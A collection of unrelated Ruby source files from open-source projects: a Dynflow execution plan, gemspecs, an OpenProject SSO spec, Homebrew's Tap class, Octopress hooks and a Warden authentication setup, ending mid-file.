def add_plan_step(action_class, caller_action = nil)
add_step(Steps::PlanStep, action_class, generate_action_id).tap do |step|
# TODO: to be removed and preferred by the caller_action
if caller_action && caller_action.execution_plan_id == self.id
@steps[caller_action.plan_step_id].children << step.id
end
step.initialize_action(caller_action)
end
end
def add_run_step(action)
add_step(Steps::RunStep, action.class, action.id).tap do |step|
step.update_from_action(action)
@dependency_graph.add_dependencies(step, action)
current_run_flow.add_and_resolve(@dependency_graph, Flows::Atom.new(step.id))
end
end
def add_finalize_step(action)
add_step(Steps::FinalizeStep, action.class, action.id).tap do |step|
step.update_from_action(action)
finalize_flow << Flows::Atom.new(step.id)
end
end
def to_hash
recursive_to_hash id: id,
class: self.class.to_s,
label: label,
state: state,
result: result,
root_plan_step_id: root_plan_step && root_plan_step.id,
run_flow: run_flow,
finalize_flow: finalize_flow,
step_ids: steps.map { |id, _| id },
started_at: time_to_str(started_at),
ended_at: time_to_str(ended_at),
execution_time: execution_time,
real_time: real_time,
execution_history: execution_history.to_hash
end
def save
persistence.save_execution_plan(self)
end
def self.new_from_hash(hash, world)
check_class_matching hash
execution_plan_id = hash[:id]
steps = steps_from_hash(hash[:step_ids], execution_plan_id, world)
self.new(world,
execution_plan_id,
hash[:label],
hash[:state],
steps[hash[:root_plan_step_id]],
Flows::Abstract.from_hash(hash[:run_flow]),
Flows::Abstract.from_hash(hash[:finalize_flow]),
steps,
string_to_time(hash[:started_at]),
string_to_time(hash[:ended_at]),
hash[:execution_time].to_f,
hash[:real_time].to_f,
ExecutionHistory.new_from_hash(hash[:execution_history]))
rescue => plan_exception
begin
world.logger.error("Could not load execution plan #{execution_plan_id}")
world.logger.error(plan_exception)
InvalidPlan.new(plan_exception, execution_plan_id,
hash[:label],
hash[:state],
string_to_time(hash[:started_at]),
string_to_time(hash[:ended_at]),
hash[:execution_time].to_f,
hash[:real_time].to_f,
ExecutionHistory.new_from_hash(hash[:execution_history]))
rescue => invalid_plan_exception
world.logger.error("Could not even load a fallback execution plan for #{execution_plan_id}")
world.logger.error(invalid_plan_exception)
InvalidPlan.new(invalid_plan_exception, execution_plan_id,
hash[:label],
hash[:state])
end
end
def compute_execution_time
self.steps.values.reduce(0) do |execution_time, step|
execution_time + (step.execution_time || 0)
end
end
# @return [0..1] the percentage of the progress. See Action::Progress for more
# info
def progress
return 0 if [:pending, :planning, :scheduled].include?(state)
flow_step_ids = run_flow.all_step_ids + finalize_flow.all_step_ids
plan_done, plan_total = flow_step_ids.reduce([0.0, 0]) do |(done, total), step_id|
step = self.steps[step_id]
[done + (step.progress_done * step.progress_weight),
total + step.progress_weight]
end
plan_total > 0 ? (plan_done / plan_total) : 1
end
def entry_action
@entry_action ||= root_plan_step.action(self)
end
# @return [Array<Action>] actions in Present phase
def actions
@actions ||= begin
[entry_action] + entry_action.all_planned_actions
end
end
def caller_execution_plan_id
entry_action.caller_execution_plan_id
end
private
def persistence
world.persistence
end
def add_step(step_class, action_class, action_id, state = :pending)
step_class.new(self.id,
self.generate_step_id,
state,
action_class,
action_id,
nil,
world).tap do |new_step|
@steps[new_step.id] = new_step
end
end
def self.steps_from_hash(step_ids, execution_plan_id, world)
steps = world.persistence.load_steps(execution_plan_id, world)
ids_to_steps = steps.inject({}) do |hash, step|
hash[step.id.to_i] = step
hash
end
# to make sure to we preserve the order of the steps
step_ids.inject({}) do |hash, step_id|
step = ids_to_steps[step_id.to_i]
if step.nil?
raise Errors::DataConsistencyError, "Could not load steps for execution plan #{execution_plan_id}"
else
hash[step_id.to_i] = step
end
hash
end
end
def unlock_all_singleton_locks!
filter = { :owner_id => 'execution-plan:' + self.id,
:class => Dynflow::Coordinator::SingletonActionLock.to_s }
world.coordinator.find_locks(filter).each do |lock|
world.coordinator.release(lock)
end
end
private_class_method :steps_from_hash
end
# rubocop:enable Metrics/ClassLength
end
| 32.614414 | 108 | 0.597591 |
2855f6835f9c0b182658499115261bab85cd736c | 1,484 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "this_day_in_history/version"
Gem::Specification.new do |spec|
spec.name = "this_day_in_history"
spec.version = ThisDayInHistory::VERSION
spec.authors = ["Jeremiah Lutes"]
spec.email = ["[email protected]"]
spec.summary = "Scraper CLI that pulls a list of historical events from History.com"
#spec.description = %q{TODO: Write a longer description or delete this line.}
spec.homepage = "https://github.com/81Jeremiah/this_day_in_history-cli-app"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
# if spec.respond_to?(:metadata)
# spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
# else
# raise "RubyGems 2.0 or newer is required to protect against " \
# "public gem pushes."
# end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 40.108108 | 96 | 0.673854 |
1a0d315310831b2f4109afe39ceecfd07dd9f31d | 5,528 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe MyController, type: :controller do
render_views
let(:sso_config) do
{
header: header,
secret: secret
}
end
let(:header) { "X-Remote-User" }
let(:secret) { "42" }
let!(:auth_source) { DummyAuthSource.create name: "Dummy LDAP" }
let!(:user) { FactoryBot.create :user, login: login, auth_source_id: auth_source.id, last_login_on: 5.days.ago }
let(:login) { "h.wurst" }
shared_examples "auth source sso failure" do
def attrs(user)
user.attributes.slice(:login, :mail, :auth_source_id)
end
it "should redirect to AccountController#sso to show the error" do
expect(response).to redirect_to "/sso"
failure = session[:auth_source_sso_failure]
expect(failure).to be_present
expect(attrs(failure[:user])).to eq attrs(user)
expect(failure[:login]).to eq login
expect(failure[:back_url]).to eq "http://test.host/my/account"
expect(failure[:ttl]).to eq 1
end
context 'when the config is marked optional' do
let(:sso_config) do
{
header: header,
secret: secret,
optional: true
}
end
it "should redirect to login" do
expect(response).to redirect_to("/login?back_url=http%3A%2F%2Ftest.host%2Fmy%2Faccount")
end
end
end
before do
if sso_config
allow(OpenProject::Configuration)
.to receive(:auth_source_sso)
.and_return(sso_config)
end
separator = secret ? ':' : ''
request.headers[header] = "#{login}#{separator}#{secret}"
end
describe 'login' do
before do
get :account
end
it "should log in given user" do
expect(response).to redirect_to my_page_path
expect(session[:user_id]).to eq user.id
end
context 'when the secret being null' do
let(:secret) { nil }
it "should log in given user" do
expect(response).to redirect_to my_page_path
expect(user.reload.last_login_on).to be_within(10.seconds).of(Time.now)
expect(session[:user_id]).to eq user.id
end
end
context 'when the user is invited' do
let!(:user) do
FactoryBot.create :user, login: login, status: Principal.statuses[:invited], auth_source_id: auth_source.id
end
it "should log in given user and activate it" do
expect(response).to redirect_to my_page_path
expect(user.reload).to be_active
expect(session[:user_id]).to eq user.id
end
end
context "with no auth source sso configured" do
let(:sso_config) { nil }
it "should redirect to login" do
expect(response).to redirect_to("/login?back_url=http%3A%2F%2Ftest.host%2Fmy%2Faccount")
end
end
context "with a non-active user user" do
let(:user) { FactoryBot.create :user, login: login, auth_source_id: auth_source.id, status: 2 }
it_should_behave_like "auth source sso failure"
end
context "with an invalid user" do
let(:auth_source) { DummyAuthSource.create name: "Onthefly LDAP", onthefly_register: true }
let!(:duplicate) { FactoryBot.create :user, mail: "[email protected]" }
let(:login) { "dummy_dupuser" }
let(:user) do
FactoryBot.build :user, login: login, mail: duplicate.mail, auth_source_id: auth_source.id
end
it_should_behave_like "auth source sso failure"
end
end
context 'when the logged-in user differs from the header' do
let(:other_user) { FactoryBot.create :user, login: 'other_user' }
let(:session_update_time) { 1.minute.ago }
let(:service) { Users::LogoutService.new(controller: controller) }
before do
session[:user_id] = other_user.id
session[:updated_at] = session_update_time
end
it 'logs out the user and logs it in again' do
allow(::Users::LogoutService).to receive(:new).and_return(service)
allow(service).to receive(:call).with(other_user).and_call_original
get :account
expect(service).to have_received(:call).with(other_user)
expect(response).to redirect_to my_page_path
expect(user.reload.last_login_on).to be_within(10.seconds).of(Time.now.utc)
expect(session[:user_id]).to eq user.id
expect(session[:updated_at]).to be > session_update_time
end
end
end
| 31.409091 | 115 | 0.681802 |
5dd44e4091a91b657b3c90523ee25eaf334ef49b | 1,255 | module Hoox
# Public: A hook to tokenize tab symbols before hook delegation
class TabHideHook < Hoox::Hook
def initialize
# The token to substitite for tabs
@tab_subst="~!~ "
end
# Substiute tabs for tokens
def preprocess(arg)
if arg[/\t/]
arg.gsub!( /\t/, @tab_subst )
end
arg
end
# Substitute the tokens for tabs
def postprocess(arg)
arg.gsub!( @tab_subst, "\t" )
arg
end
end
# Public: Strip away pre code tags for processing, and
# restore upon exit
class HtmlPreElementHideHook < Hoox::RegexHideHook
def initialize
# The token to substitite for pre elements
@regex = "<pre.*?<\/pre>"
super
end
end
# Publlic: Hide all HTML tags from downstream hooks
class HtmlTagToken < Hoox::RegexHideHook
def initialize
# The token to substitite for tabs
@regex = "/<\/?[^>]*?>/"
super
end
end
class MarkdownHyperlinkHook < Hoox::Hook
def applies(arg)
arg.include? "]("
end
# Internal: Swap the Markdown Link tokens for HTML a elements
def execute( arg )
arg.gsub!( /\[(.*?)\]\((.*?)\)/ ) { |m|
m = "<a href=\"#{$2}\">#{$1}</a>"
}
arg
end
end
end
| 21.637931 | 65 | 0.58008 |
2145d085fa6405792d83ae5bf38717a2aaa5ce94 | 851 | require 'test_helper'
class AnnouncementClearerTest < ActiveSupport::TestCase
test '#clear! any associated announcement from the search index' do
announcement = create(:statistics_announcement)
statistics = create(:published_statistics,
statistics_announcement: announcement)
Whitehall::SearchIndex.expects(:delete).with(announcement)
ServiceListeners::AnnouncementClearer.new(statistics).clear!
end
test '#clear! does not raise an error if the edition does not have an announcement' do
statistics = create(:published_statistics)
ServiceListeners::AnnouncementClearer.new(statistics).clear!
end
test '#clear! does not raise an error if the edition is not a statistical publication' do
statistics = create(:published_case_study)
ServiceListeners::AnnouncementClearer.new(statistics).clear!
end
end
| 37 | 91 | 0.777908 |
33d24cfa4d8ce212bf6b95b3153b643a44969b8c | 1,415 | # frozen_string_literal: true
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'guard/kibit/version'
Gem::Specification.new do |spec|
spec.name = 'guard-kibit'
spec.version = GuardKibitVersion.to_s
spec.authors = ['Eric Musgrove']
spec.email = ['[email protected]']
spec.summary = 'Guard plugin for Kibit'
spec.description = 'Guard::Kibit automatically checks Clojure code style with Kibit ' \
'when files are modified.'
spec.homepage = 'https://github.com/tenpaiyomi/guard-kibit'
spec.license = 'MIT'
spec.files = `git ls-files`.split($INPUT_RECORD_SEPARATOR)
spec.executables = spec.files.grep(/^bin\//) { |f| File.basename(f) }
spec.test_files = spec.files.grep(/^spec\//)
spec.require_paths = ['lib']
spec.add_dependency 'guard', '~> 2.1'
spec.add_dependency 'guard-compat', '~> 1.1'
spec.add_development_dependency 'bundler', '~> 1.3'
spec.add_development_dependency 'guard-rspec', '>= 4.2.3', '< 5.0'
spec.add_development_dependency 'guard-rubocop', '~> 1.3.0'
spec.add_development_dependency 'rake', '~> 12.0'
spec.add_development_dependency 'rspec', '~> 3.0'
spec.add_development_dependency 'rubocop', '~> 0.20'
spec.add_development_dependency 'simplecov', '~> 0.7'
end
| 40.428571 | 91 | 0.646643 |
38855f2e85aed6c0fde33e276c00ab6faea16f24 | 1,446 | # frozen_string_literal: true
module Renalware
log "Adding Medication Routes" do
module RR
ORAL = 1
TOPICAL = 2
INHALATION = 3
INJECTION = 4
INTRAPERITONEAL = 5
OTHER = 9
end
MRoute = Medications::MedicationRoute
MRoute.transaction do
MRoute.find_or_create_by!(code: "PO", name: "Per Oral", rr_code: RR::ORAL)
MRoute.find_or_create_by!(code: "IV", name: "Intravenous", rr_code: RR::INJECTION)
MRoute.find_or_create_by!(code: "SC", name: "Subcutaneous", rr_code: RR::INJECTION)
MRoute.find_or_create_by!(code: "IM", name: "Intramuscular", rr_code: RR::INJECTION)
MRoute.find_or_create_by!(code: "IP", name: "Intraperitoneal", rr_code: RR::INTRAPERITONEAL)
MRoute.find_or_create_by!(code: "INH", name: "Inhaler", rr_code: RR::INHALATION)
MRoute.find_or_create_by!(code: "SL", name: "Sublingual", rr_code: RR::OTHER)
MRoute.find_or_create_by!(code: "NG", name: "Nasogastric", rr_code: RR::OTHER)
MRoute.find_or_create_by!(code: "PARENT", name: "Parenteral", rr_code: RR::INJECTION)
MRoute.find_or_create_by!(code: "PERCUT", name: "Percutaneous", rr_code: RR::OTHER)
MRoute.find_or_create_by!(code: "TOP", name: "Topical", rr_code: RR::TOPICAL)
MRoute.find_or_create_by!(code: "OTHER", name: "Other", rr_code: RR::OTHER)
MRoute.find_or_create_by!(code: "PR", name: "PerRectum", rr_code: RR::OTHER)
end
end
end
| 45.1875 | 98 | 0.67704 |
1138cf6149da96c102380ec640bd8cbf7fe0c449 | 18,123 | # frozen_string_literal: true
require "commands"
require "extend/cachable"
require "readall"
require "description_cache_store"
# A {Tap} is used to extend the formulae provided by Homebrew core.
# Usually, it's synced with a remote git repository. And it's likely
# a GitHub repository with the name of `user/homebrew-repo`. In such
# case, `user/repo` will be used as the {#name} of this {Tap}, where
# {#user} represents GitHub username and {#repo} represents repository
# name without leading `homebrew-`.
class Tap
extend Cachable
TAP_DIRECTORY = (HOMEBREW_LIBRARY/"Taps").freeze
def self.fetch(*args)
case args.length
when 1
user, repo = args.first.split("/", 2)
when 2
user = args.first
repo = args.second
end
raise "Invalid tap name '#{args.join("/")}'" if [user, repo].any? { |part| part.nil? || part.include?("/") }
# We special case homebrew and linuxbrew so that users don't have to shift in a terminal.
user = user.capitalize if ["homebrew", "linuxbrew"].include? user
repo = repo.sub(HOMEBREW_OFFICIAL_REPO_PREFIXES_REGEX, "")
return CoreTap.instance if ["Homebrew", "Linuxbrew"].include?(user) && ["core", "homebrew"].include?(repo)
cache_key = "#{user}/#{repo}".downcase
cache.fetch(cache_key) { |key| cache[key] = Tap.new(user, repo) }
end
def self.from_path(path)
match = File.expand_path(path).match(HOMEBREW_TAP_PATH_REGEX)
raise "Invalid tap path '#{path}'" unless match
fetch(match[:user], match[:repo])
rescue
# No need to error as a nil tap is sufficient to show failure.
nil
end
def self.default_cask_tap
@default_cask_tap ||= fetch("Homebrew", "cask")
end
extend Enumerable
# The user name of this {Tap}. Usually, it's the GitHub username of
# this {Tap}'s remote repository.
attr_reader :user
# The repository name of this {Tap} without leading `homebrew-`.
attr_reader :repo
# The name of this {Tap}. It combines {#user} and {#repo} with a slash.
# {#name} is always in lowercase.
# e.g. `user/repo`
attr_reader :name
# The full name of this {Tap}, including the `homebrew-` prefix.
# It combines {#user} and 'homebrew-'-prefixed {#repo} with a slash.
# e.g. `user/homebrew-repo`
attr_reader :full_name
# The local path to this {Tap}.
# e.g. `/usr/local/Library/Taps/user/homebrew-repo`
attr_reader :path
# @private
def initialize(user, repo)
@user = user
@repo = repo
@name = "#{@user}/#{@repo}".downcase
@full_name = "#{@user}/homebrew-#{@repo}"
@path = TAP_DIRECTORY/@full_name.downcase
@path.extend(GitRepositoryExtension)
@alias_table = nil
@alias_reverse_table = nil
end
# Clear internal cache
def clear_cache
@remote = nil
@repo_var = nil
@formula_dir = nil
@cask_dir = nil
@command_dir = nil
@formula_files = nil
@alias_dir = nil
@alias_files = nil
@aliases = nil
@alias_table = nil
@alias_reverse_table = nil
@command_files = nil
@formula_renames = nil
@tap_migrations = nil
@config = nil
remove_instance_variable(:@private) if instance_variable_defined?(:@private)
end
# The remote path to this {Tap}.
# e.g. `https://github.com/user/homebrew-repo`
def remote
raise TapUnavailableError, name unless installed?
@remote ||= path.git_origin
end
# The default remote path to this {Tap}.
def default_remote
"https://github.com/#{full_name}"
end
def repo_var
@repo_var ||= path.to_s
.delete_prefix(TAP_DIRECTORY.to_s)
.tr("^A-Za-z0-9", "_")
.upcase
end
# True if this {Tap} is a git repository.
def git?
path.git?
end
# git branch for this {Tap}.
def git_branch
raise TapUnavailableError, name unless installed?
path.git_branch
end
# git HEAD for this {Tap}.
def git_head
raise TapUnavailableError, name unless installed?
path.git_head
end
# git HEAD in short format for this {Tap}.
def git_short_head
raise TapUnavailableError, name unless installed?
path.git_short_head
end
# Time since git last commit for this {Tap}.
def git_last_commit
raise TapUnavailableError, name unless installed?
path.git_last_commit
end
# git last commit date for this {Tap}.
def git_last_commit_date
raise TapUnavailableError, name unless installed?
path.git_last_commit_date
end
# The issues URL of this {Tap}.
# e.g. `https://github.com/user/homebrew-repo/issues`
def issues_url
return unless official? || !custom_remote?
"#{default_remote}/issues"
end
def to_s
name
end
def version_string
return "N/A" unless installed?
pretty_revision = git_short_head
return "(no git repository)" unless pretty_revision
"(git revision #{pretty_revision}; last commit #{git_last_commit_date})"
end
# True if this {Tap} is an official Homebrew tap.
def official?
user == "Homebrew"
end
# True if the remote of this {Tap} is a private repository.
def private?
return @private if instance_variable_defined?(:@private)
@private = read_or_set_private_config
end
# {TapConfig} of this {Tap}
def config
@config ||= begin
raise TapUnavailableError, name unless installed?
TapConfig.new(self)
end
end
# True if this {Tap} has been installed.
def installed?
path.directory?
end
# True if this {Tap} is not a full clone.
def shallow?
(path/".git/shallow").exist?
end
# @private
def core_tap?
false
end
# Install this {Tap}.
#
# @param clone_target [String] If passed, it will be used as the clone remote.
# @param force_auto_update [Boolean, nil] If present, whether to override the
# logic that skips non-GitHub repositories during auto-updates.
# @param full_clone [Boolean] If set as true, full clone will be used. If unset/nil, means "no change".
# @param quiet [Boolean] If set, suppress all output.
def install(full_clone: true, quiet: false, clone_target: nil, force_auto_update: nil)
require "descriptions"
if official? && DEPRECATED_OFFICIAL_TAPS.include?(repo)
odie "#{name} was deprecated. This tap is now empty and all its contents were either deleted or migrated."
elsif user == "caskroom"
new_repo = repo == "cask" ? "cask" : "cask-#{repo}"
odie "#{name} was moved. Tap homebrew/#{new_repo} instead."
end
requested_remote = clone_target || default_remote
if installed?
raise TapRemoteMismatchError.new(name, @remote, requested_remote) if clone_target && requested_remote != remote
raise TapAlreadyTappedError, name if force_auto_update.nil? && !shallow?
end
# ensure git is installed
Utils.ensure_git_installed!
if installed?
unless force_auto_update.nil?
config["forceautoupdate"] = force_auto_update
return if !full_clone || !shallow?
end
ohai "Unshallowing #{name}" unless quiet
args = %w[fetch --unshallow]
args << "-q" if quiet
path.cd { safe_system "git", *args }
return
end
clear_cache
ohai "Tapping #{name}" unless quiet
args = %W[clone #{requested_remote} #{path}]
args << "--depth=1" unless full_clone
args << "-q" if quiet
begin
safe_system "git", *args
unless Readall.valid_tap?(self, aliases: true)
raise "Cannot tap #{name}: invalid syntax in tap!" unless Homebrew::EnvConfig.developer?
end
rescue Interrupt, RuntimeError
ignore_interrupts do
# wait for git to possibly cleanup the top directory when interrupt happens.
sleep 0.1
FileUtils.rm_rf path
path.parent.rmdir_if_possible
end
raise
end
config["forceautoupdate"] = force_auto_update unless force_auto_update.nil?
Commands.rebuild_commands_completion_list
link_completions_and_manpages
formatted_contents = contents.presence&.to_sentence&.dup&.prepend(" ")
puts "Tapped#{formatted_contents} (#{path.abv})." unless quiet
CacheStoreDatabase.use(:descriptions) do |db|
DescriptionCacheStore.new(db)
.update_from_formula_names!(formula_names)
end
return if clone_target
return unless private?
return if quiet
puts <<~EOS
It looks like you tapped a private repository. To avoid entering your
credentials each time you update, you can use git HTTP credential
caching or issue the following command:
cd #{path}
git remote set-url origin [email protected]:#{full_name}.git
EOS
end
def link_completions_and_manpages
command = "brew tap --repair"
Utils::Link.link_manpages(path, command)
Utils::Link.link_completions(path, command)
end
# Uninstall this {Tap}.
def uninstall
require "descriptions"
raise TapUnavailableError, name unless installed?
puts "Untapping #{name}..."
abv = path.abv
formatted_contents = contents.presence&.to_sentence&.dup&.prepend(" ")
unpin if pinned?
CacheStoreDatabase.use(:descriptions) do |db|
DescriptionCacheStore.new(db)
.delete_from_formula_names!(formula_names)
end
Utils::Link.unlink_manpages(path)
Utils::Link.unlink_completions(path)
path.rmtree
path.parent.rmdir_if_possible
puts "Untapped#{formatted_contents} (#{abv})."
Commands.rebuild_commands_completion_list
clear_cache
end
# True if the {#remote} of {Tap} is customized.
def custom_remote?
return true unless remote
remote.casecmp(default_remote).nonzero?
end
# Path to the directory of all {Formula} files for this {Tap}.
def formula_dir
@formula_dir ||= potential_formula_dirs.find(&:directory?) || path/"Formula"
end
def potential_formula_dirs
@potential_formula_dirs ||= [path/"Formula", path/"HomebrewFormula", path].freeze
end
# Path to the directory of all {Cask} files for this {Tap}.
def cask_dir
@cask_dir ||= path/"Casks"
end
def contents
contents = []
if (command_count = command_files.count).positive?
contents << "#{command_count} #{"command".pluralize(command_count)}"
end
if (cask_count = cask_files.count).positive?
contents << "#{cask_count} #{"cask".pluralize(cask_count)}"
end
if (formula_count = formula_files.count).positive?
contents << "#{formula_count} #{"formula".pluralize(formula_count)}"
end
contents
end
# An array of all {Formula} files of this {Tap}.
def formula_files
@formula_files ||= if formula_dir.directory?
formula_dir.children.select(&method(:ruby_file?))
else
[]
end
end
# An array of all {Cask} files of this {Tap}.
def cask_files
@cask_files ||= if cask_dir.directory?
cask_dir.children.select(&method(:ruby_file?))
else
[]
end
end
# returns true if the file has a Ruby extension
# @private
def ruby_file?(file)
file.extname == ".rb"
end
# return true if given path would present a {Formula} file in this {Tap}.
# accepts both absolute path and relative path (relative to this {Tap}'s path)
# @private
def formula_file?(file)
file = Pathname.new(file) unless file.is_a? Pathname
file = file.expand_path(path)
ruby_file?(file) && file.parent == formula_dir
end
# return true if given path would present a {Cask} file in this {Tap}.
# accepts both absolute path and relative path (relative to this {Tap}'s path)
# @private
def cask_file?(file)
file = Pathname.new(file) unless file.is_a? Pathname
file = file.expand_path(path)
ruby_file?(file) && file.parent == cask_dir
end
# An array of all {Formula} names of this {Tap}.
def formula_names
@formula_names ||= formula_files.map(&method(:formula_file_to_name))
end
# An array of all {Cask} tokens of this {Tap}.
def cask_tokens
@cask_tokens ||= cask_files.map(&method(:formula_file_to_name))
end
# path to the directory of all alias files for this {Tap}.
# @private
def alias_dir
@alias_dir ||= path/"Aliases"
end
# an array of all alias files of this {Tap}.
# @private
def alias_files
@alias_files ||= Pathname.glob("#{alias_dir}/*").select(&:file?)
end
# an array of all aliases of this {Tap}.
# @private
def aliases
@aliases ||= alias_files.map { |f| alias_file_to_name(f) }
end
# a table mapping alias to formula name
# @private
def alias_table
return @alias_table if @alias_table
@alias_table = {}
alias_files.each do |alias_file|
@alias_table[alias_file_to_name(alias_file)] = formula_file_to_name(alias_file.resolved_path)
end
@alias_table
end
# a table mapping formula name to aliases
# @private
def alias_reverse_table
return @alias_reverse_table if @alias_reverse_table
@alias_reverse_table = {}
alias_table.each do |alias_name, formula_name|
@alias_reverse_table[formula_name] ||= []
@alias_reverse_table[formula_name] << alias_name
end
@alias_reverse_table
end
def command_dir
@command_dir ||= path/"cmd"
end
# An array of all commands files of this {Tap}.
def command_files
@command_files ||= if command_dir.directory?
Commands.find_commands(command_dir)
else
[]
end
end
# path to the pin record for this {Tap}.
# @private
def pinned_symlink_path
HOMEBREW_LIBRARY/"PinnedTaps/#{name}"
end
# True if this {Tap} has been pinned.
def pinned?
return @pinned if instance_variable_defined?(:@pinned)
@pinned = pinned_symlink_path.directory?
end
def to_hash
hash = {
"name" => name,
"user" => user,
"repo" => repo,
"path" => path.to_s,
"installed" => installed?,
"official" => official?,
"formula_names" => formula_names,
"formula_files" => formula_files.map(&:to_s),
"cask_tokens" => cask_tokens,
"cask_files" => cask_files.map(&:to_s),
"command_files" => command_files.map(&:to_s),
}
if installed?
hash["remote"] = remote
hash["custom_remote"] = custom_remote?
hash["private"] = private?
end
hash
end
# Hash with tap formula renames
def formula_renames
require "json"
@formula_renames ||= if (rename_file = path/"formula_renames.json").file?
JSON.parse(rename_file.read)
else
{}
end
end
# Hash with tap migrations
def tap_migrations
require "json"
@tap_migrations ||= if (migration_file = path/"tap_migrations.json").file?
JSON.parse(migration_file.read)
else
{}
end
end
def ==(other)
other = Tap.fetch(other) if other.is_a?(String)
self.class == other.class && name == other.name
end
def self.each
return unless TAP_DIRECTORY.directory?
return to_enum unless block_given?
TAP_DIRECTORY.subdirs.each do |user|
user.subdirs.each do |repo|
yield fetch(user.basename.to_s, repo.basename.to_s)
end
end
end
# An array of all installed {Tap} names.
def self.names
map(&:name).sort
end
# An array of all tap cmd directory {Pathname}s
def self.cmd_directories
Pathname.glob TAP_DIRECTORY/"*/*/cmd"
end
# @private
def formula_file_to_name(file)
"#{name}/#{file.basename(".rb")}"
end
# @private
def alias_file_to_name(file)
"#{name}/#{file.basename}"
end
private
def read_or_set_private_config
case config["private"]
when "true" then true
when "false" then false
else
config["private"] = begin
if custom_remote?
true
else
GitHub.private_repo?(full_name)
end
rescue GitHub::HTTPNotFoundError
true
rescue GitHub::Error
false
end
end
end
end
# A specialized {Tap} class for the core formulae.
class CoreTap < Tap
# @private
def initialize
super "Homebrew", "core"
end
def self.instance
@instance ||= new
end
def self.ensure_installed!
return if instance.installed?
safe_system HOMEBREW_BREW_FILE, "tap", instance.name
end
def install(full_clone: true, quiet: false, clone_target: nil, force_auto_update: nil)
remote = Homebrew::EnvConfig.core_git_remote
puts "HOMEBREW_CORE_GIT_REMOTE set: using #{remote} for Homebrew/core Git remote URL." if remote != default_remote
super(full_clone: full_clone, quiet: quiet, clone_target: remote, force_auto_update: force_auto_update)
end
# @private
def uninstall
raise "Tap#uninstall is not available for CoreTap"
end
# @private
def pin
raise "Tap#pin is not available for CoreTap"
end
# @private
def unpin
raise "Tap#unpin is not available for CoreTap"
end
# @private
def pinned?
false
end
# @private
def core_tap?
true
end
# @private
def formula_dir
@formula_dir ||= begin
self.class.ensure_installed!
super
end
end
# @private
def alias_dir
@alias_dir ||= begin
self.class.ensure_installed!
super
end
end
# @private
def formula_renames
@formula_renames ||= begin
self.class.ensure_installed!
super
end
end
# @private
def tap_migrations
@tap_migrations ||= begin
self.class.ensure_installed!
super
end
end
# @private
def formula_file_to_name(file)
file.basename(".rb").to_s
end
# @private
def alias_file_to_name(file)
file.basename.to_s
end
end
# Permanent configuration per {Tap} using `git-config(1)`.
class TapConfig
attr_reader :tap
def initialize(tap)
@tap = tap
end
def [](key)
return unless tap.git?
return unless Utils.git_available?
tap.path.cd do
Utils.popen_read("git", "config", "--get", "homebrew.#{key}").chomp.presence
end
end
def []=(key, value)
return unless tap.git?
return unless Utils.git_available?
tap.path.cd do
safe_system "git", "config", "--replace-all", "homebrew.#{key}", value.to_s
end
end
end
require "extend/os/tap"
| 24.894231 | 118 | 0.663742 |
e917c194be879eeb315cc076088eb5b5e69895d0 | 270 | class Api::ItemSerializer
include FastJsonapi::ObjectSerializer
belongs_to :category
has_many :materials
attributes :name, :price, :description, :adjustable, :recycled, :image, :customizable, :status, :created_at, :updated_at, :size, :category, :materials
end
| 30 | 152 | 0.762963 |
e2f274c0665e4063140bdd63eb1ef0920a74c4ba | 794 | module Octopress
module Filters
if defined?(Jekyll::Hooks)
Jekyll::Hooks.register :site, :post_read do |site|
Octopress::Filters.site = site
end
Jekyll::Hooks.register :post, :pre_render do |post, payload|
excerpted = post.content.match(post.site.config['excerpt_separator'])
payload['excerpted'] = !!excerpted
end
else
require 'octopress-hooks'
class SiteGrabber < Hooks::Site
def post_read(site)
Octopress::Filters.site = site
end
end
class PostHooks < Hooks::Post
def pre_render(post)
excerpted = post.content.match(post.site.config['excerpt_separator'])
post.data.merge!({'excerpted' => !!excerpted})
end
end
end
end
end
| 23.352941 | 79 | 0.605793 |
7a926afe4889a410982c43efa4c8ee135434a9e9 | 175 | Before("@personalizeevents") do
@service = Aws::PersonalizeEvents::Resource.new
@client = @service.client
end
After("@personalizeevents") do
# shared cleanup logic
end
| 19.444444 | 49 | 0.742857 |
b9c5762bddd856362ffe73ef7f0396148f96afac | 1,248 | Rails.application.config.middleware.use Warden::Manager do |manager|
manager.default_strategies :password_form
end
Warden::Strategies.add(:password_form) do
def authenticate!
auth = AuthenticationService.new(params)
if auth.authenticated?
success! auth.user
else
fail! "Invalid email or password"
end
end
end
Warden::Manager.after_set_user do |user, auth|
auth.cookies.signed.permanent[:auth_token] = user.auth_token
Current.user = user
end
Warden::Manager.before_logout do |_user, auth|
auth.cookies.delete(:auth_token)
Current.user = nil
end
module Warden
class SessionSerializer
def serialize(user)
[user.class.name, user.auth_token]
end
def deserialize(key)
klass, auth_token = key
klass = case klass
when Class
klass
when String, Symbol
klass.to_s.classify.constantize
end
klass.find_by(auth_token: auth_token)
end
end
module Mixins
module Common
def request
